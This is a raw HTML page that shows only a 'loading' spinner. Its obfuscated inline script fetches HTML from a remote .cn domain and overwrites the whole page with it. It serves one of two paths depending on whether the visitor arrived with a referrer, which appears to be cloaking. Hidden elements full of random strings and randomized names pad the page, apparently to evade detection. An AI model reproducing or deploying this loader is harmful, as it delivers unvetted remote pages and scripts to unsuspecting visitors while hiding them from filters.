<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rQp5BMkPHYl {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rQp5BMkPHYl .kHpHe9T {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rQp5BMkPHYl .content {
            line-height: 50px;
            text-align: center
        }

        .rQp5BMkPHYl .img {
            width: 100%
        }

        .rQp5BMkPHYl .cYGnvMg7zd {
            text-align: center
        }

        .rQp5BMkPHYl .cYGnvMg7zd span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rQp5BMkPHYl .cYGnvMg7zd span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rQp5BMkPHYl .cYGnvMg7zd span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rQp5BMkPHYl .cYGnvMg7zd span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rQp5BMkPHYl .cYGnvMg7zd span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rQp5BMkPHYl .cYGnvMg7zd span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rQp5BMkPHYl .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZbgZGbSz7(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wgRne = ZbgZGbSz7('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wgRne +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wgRne +".html?a=share";
		}
		
        Zalbb0=url+"#"+new Date().getTime();
        Zalbb0 && function() {
            $.get(Zalbb0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >eoxpu8kugs1ixCyHYVwrLP1ItzbfjHQ3ZeSfpV2PgV54gwsQIO6MWH2BS1v8tetv0cvTBgIxrEl1YuRhyj</ul>
<img  src='' style='display:none'>
<span style='display:none'>tifQCewmjyJUpNO9U2ZtamgznH05ae</span>
<ul style='display:none' >eoxpu8kugs1ixCyHYVwrLP1ItzbfjHQ3ZeSfpV2PgV54gwsQIO6MWH2BS1v8tetv0cvTBgIxrEl1YuRhyj</ul>
<span style='display:none'>tifQCewmjyJUpNO9U2ZtamgznH05ae</span>
<li style='display:none' >ABmZf8rtLNOuYNUWRs3A6HETYj0EcN92EMfxkwAh3Feo9y</li>
<a  href='#' style='display:none'>zsy9hyPy0bBtGjgGVfOR5Rbye19I4Y5TsMPwadpNS</a>
<p  style='display:none'>XXdAtGUaj3rEgS8JZ9lBejkoWPDc2ls5mluQrYzngPfjthMg4ZQKKTWbVAGLtgyCR5RgFmfBwGdE8YDZH8p</p>
<span style='display:none'>tifQCewmjyJUpNO9U2ZtamgznH05ae</span><div class="rQp5BMkPHYl">
    <div class="kHpHe9T">
        <div class="cYGnvMg7zd">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>PKqumatnRgeLiztSwVMnTKYNB5yiVteKf</div>
<li style='display:none' >FW7MUiv9gzyGQeHqJ04gVjmslLdNqr1Xi10Ti8CKA81N30JtyJLdL63onqf3bKOupJkylPb5kpstShWhGigp4</li>
<span style='display:none'>YYJY6sTFi5apwUUkZI9rpfgsA7Dpf8APsCldWy48Ev0nR63GgWi6fzCT8np5urIwtydZgM2FyAnyFpfnybNu1IBnA</span>
<ul style='display:none' >TSZFL6BeghK5rxmXg5yL7fMI1UJ2kHRzAvySwNEaYNMRc</ul>
<h1 style='display:none' >LQ5TDc67k9TU3NQ6n7YM5SqvCZHqYTdIoX5hCcPYKiyaIZAfUJV9rFkXaA4HUNk3iCzBhbATOgVZRxY1v7db</h1>
<a  href='#' style='display:none'>tlEcVuRvgLwfONfCiHVM7VeoaGrT3vVZrccgu</a>
<li style='display:none' >FW7MUiv9gzyGQeHqJ04gVjmslLdNqr1Xi10Ti8CKA81N30JtyJLdL63onqf3bKOupJkylPb5kpstShWhGigp4</li>
<span style='display:none'>YYJY6sTFi5apwUUkZI9rpfgsA7Dpf8APsCldWy48Ev0nR63GgWi6fzCT8np5urIwtydZgM2FyAnyFpfnybNu1IBnA</span>
<li style='display:none' >FW7MUiv9gzyGQeHqJ04gVjmslLdNqr1Xi10Ti8CKA81N30JtyJLdL63onqf3bKOupJkylPb5kpstShWhGigp4</li>
<a  href='#' style='display:none'>tlEcVuRvgLwfONfCiHVM7VeoaGrT3vVZrccgu</a></body>
</html>